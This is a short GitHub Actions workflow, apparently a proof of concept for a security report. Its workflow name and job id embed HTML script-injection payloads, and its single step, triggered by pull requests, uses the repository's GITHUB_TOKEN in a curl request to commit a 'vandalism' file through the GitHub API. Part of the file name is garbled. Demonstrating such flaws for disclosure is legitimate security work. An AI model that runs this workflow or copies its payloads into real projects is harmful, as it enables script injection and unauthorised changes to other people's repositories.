

name: "Proof-of-concept G<img src=x onerror=alert(1)>itHub Actions workflow"

on:
  pull_request

jobs:
  va<img>ndalize-repo:
    runs-on: ubuntu-latest
    steps:
      - name: Vandalize
        run: 'curl -H "Authorization: bearer $GITHUB_TOKEN" -X PUT "https://api.github.com/repos/$REPO/contents/vanawrekuwarniuewarewadalism.md" --data ''{"message": "#102 XQLYM5/-img-#46 https://github.com/XQLYM5/-img-/issues/46   Create vandalism.md", "content": "TkFBIHdhcyBoZXJl"}'' '
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          REPO: ${{ github.repository }}
